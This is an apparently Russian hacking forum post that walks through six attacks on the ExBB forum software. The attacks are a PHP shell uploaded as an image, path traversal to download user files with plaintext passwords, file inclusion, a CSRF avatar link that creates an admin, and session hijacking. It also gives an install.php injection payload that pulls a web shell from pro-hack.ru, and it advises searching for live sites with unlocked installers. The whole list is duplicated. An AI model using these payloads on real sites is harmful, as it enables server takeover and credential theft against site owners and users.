http://news.xss.pro/exbb.jpg
1. Приаттачивание шела.
Смотрим код:
Берем картику переименовываем в *.php, дописываем в конец <?include $u;?> и шелл уже на серваке.
2. Левый скрипт закачки.
Переменные f,t,id не фильруются совсем, где (int) )), например можно присвоить переменной t что-нибудь типа ../../../../../eat )
Это дает возможность скачать любой файл, например файл юзера, конфиг.
Уязвимость актуальна, если у вас есть доступ к серверу под другим юзером, закидываем файл(поменяв имя файла на /home/user/forum/members/1.php с настройками в темп, ставим права 777.
Потом заходим по линку:
http:/bug.ru/forum/tools?f=1&t=/../../../../../eat&id=1 и скачиваем файл с именем и паролем юзверя, а пароль хранится в незашифрованном виде!
3. Задание вместо имени языка любого значения, например ../../.. правда к этому счастью прибавляется еще строка :/, а потом файл инклудится!
Уязвимость актуальна, если у вас есть доступ к серверу под другим юзером.
4. Встраивание вместо аватара любого линка ), например скрипта с редиректом, для смены параметров, создания нового админа ).
5. Если посмотреть, как обстоят дела со скриптом инсталляции. Введем в поиске exbb, и ,выбирая домены второго уровня, добавляем к линку install.php
И что вы думаете, больше 10 сайтов с незалоченным скриптом установки (это, как правило сайты, переносившие форум). Вводим вместо линка на форум:
http://localhost/forum2'; fwrite(fopen('sh.php',w),implode('',file('http://pro-hack.ru/shell.txt')));////
Завершаем установку. Грузим индекс. В папке форума появляется веб шел )
6. Защита от перехвата сессий - никакая ) подсматриваем в темпе индификатор сесси, будет например: sess_300122f4a852a84e44614f1124716eb9
Пишем урл: http://bug/index.php?PHPSESSID=300122f4a85...4614f1124716eb9 Все друг, проснись ты в админке )
1. Приаттачивание шела.
Смотрим код:
Код:
$img = false;
if ( preg_match('#image\/[x\-]*([a-z]+)#', $HTTP_POST_FILES['FILE_UPLOAD']['type']) ) {//Проверяется заголовок
list($width, $height) = @getimagesize($HTTP_POST_FILES['FILE_UPLOAD']['tmp_name']);
$FILE_NAME = uniqid("att-").substr($FILE_NAME,-8);
$storage_name = $FILE_NAME;
$img = true;
$filetoopen = $exbb['home_path'].'uploads/'.$name;
if ( file_exists($filetoopen) ) @unlink($filetoopen);
}Берем картику переименовываем в *.php, дописываем в конец <?include $u;?> и шелл уже на серваке.
2. Левый скрипт закачки.
Код:
if ($vars['f'] == '' || $vars['t'] == '' || $vars['id'] == '') error($lang['Main_msg'],$lang['Dont_chg_url'],'',1);
$filetoopen = $exbb['home_path'].'forum'.$vars['f'].'/attaches-'.$vars['t'].'.php';
$t_attaches = ( file_exists($filetoopen) ) ? get_file($filetoopen) : array();Переменные f,t,id не фильруются совсем, где (int) )), например можно присвоить переменной t что-нибудь типа ../../../../../eat )
Это дает возможность скачать любой файл, например файл юзера, конфиг.
Уязвимость актуальна, если у вас есть доступ к серверу под другим юзером, закидываем файл(поменяв имя файла на /home/user/forum/members/1.php с настройками в темп, ставим права 777.
Потом заходим по линку:
http:/bug.ru/forum/tools?f=1&t=/../../../../../eat&id=1 и скачиваем файл с именем и паролем юзверя, а пароль хранится в незашифрованном виде!
3. Задание вместо имени языка любого значения, например ../../.. правда к этому счастью прибавляется еще строка :/, а потом файл инклудится!
Уязвимость актуальна, если у вас есть доступ к серверу под другим юзером.
4. Встраивание вместо аватара любого линка ), например скрипта с редиректом, для смены параметров, создания нового админа ).
5. Если посмотреть, как обстоят дела со скриптом инсталляции. Введем в поиске exbb, и ,выбирая домены второго уровня, добавляем к линку install.php
И что вы думаете, больше 10 сайтов с незалоченным скриптом установки (это, как правило сайты, переносившие форум). Вводим вместо линка на форум:
http://localhost/forum2'; fwrite(fopen('sh.php',w),implode('',file('http://pro-hack.ru/shell.txt')));////
Завершаем установку. Грузим индекс. В папке форума появляется веб шел )
6. Защита от перехвата сессий - никакая ) подсматриваем в темпе индификатор сесси, будет например: sess_300122f4a852a84e44614f1124716eb9
Пишем урл: http://bug/index.php?PHPSESSID=300122f4a85...4614f1124716eb9 Все друг, проснись ты в админке )
